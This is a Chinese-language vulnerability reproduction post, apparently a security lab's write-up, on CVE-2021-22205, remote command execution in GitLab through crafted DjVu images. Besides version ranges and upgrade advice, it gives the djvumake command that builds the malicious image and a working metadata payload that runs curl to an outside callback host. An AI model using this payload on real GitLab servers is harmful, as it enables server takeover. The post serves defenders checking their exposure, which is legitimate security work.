漏洞背景
GitLab是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。
近日,GitLab发布安全更新公告,修复了GitLab社区版(CE)和企业版(EE)存在一个远程命令执行漏洞,漏洞CVE编号:CVE-2021-22205。攻击者可利用该漏洞在目标服务器上执行任意命令。建议受影响用户将GitLab升级至最新版本进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。
漏洞描述
该漏洞影响从11.9开始的所有版本,由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令,最终导致Gitlab服务器被控制。
漏洞等级
高危
漏洞范围
Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8
漏洞验证
1. 登录后首页,找到New Snippets
2. 此处需要上传DjVu格式图片(即Exp)
DjVu格式图片制作方式:下载安装DjVuLibre,地址为
http://djvu.sourceforge.net/
3. 准备好将要压缩图片的文本
4. 使用命令生成图片
djvumake rce.djvu INFO=0,0 BGjp=/dev/null ANTa=rce.txt && mv rce.djvu rce.jpg
5. 上传Exp
6. 成功执行
安全建议
建议用户将GitLab社区版(CE)和企业版(EE)版本升级至13.10.3、13.9.6和13.8.8进行防护。
下载地址:https://about.gitlab.com/update
EXP如下:
(metadata
(Copyright "
" . qx{curl taotao.jqgvqz.dnslog.cn} .
" b ") )
原文始发于微信公众号(赛瑞攻防实验室):CVE-2021-22205 Gitlab远程命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论